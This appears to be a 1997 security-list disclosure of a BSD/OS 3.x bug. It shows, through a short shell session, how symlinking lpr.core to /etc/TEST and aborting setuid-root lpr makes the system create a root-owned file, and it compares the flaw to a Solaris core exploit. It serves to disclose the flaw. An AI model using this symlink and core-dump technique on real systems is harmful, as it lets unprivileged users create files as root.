BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997 danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA
i386
A small and neat bug in BSDi 3.x allows people to arbitrarly write files
with crap for data, but not overwrite them. Like so:
Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.
beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt 1 root wheel 9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]
Just to make sure that file doesn't exist :
beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]
Run program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)
beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1] + Suspended (tty input) lpr
beep[ /tmp ]
Kill it with the ABRT signal.
beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
lpr
Abort (core dumped)
beep[ /tmp ]
And voila :
beep[ /tmp ] ls -la /etc/TEST
-rw------- 1 root wheel 184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]
This exploit is similar to the Solaris 2.4 core exploit - with a few
notable diffrences :
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.
B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.
C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.
Regards,
Nir.
--
Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
USER, n.:
The word computer professionals use when they mean "idiot."
-- Dave Barry, "Claw Your Way to the Top"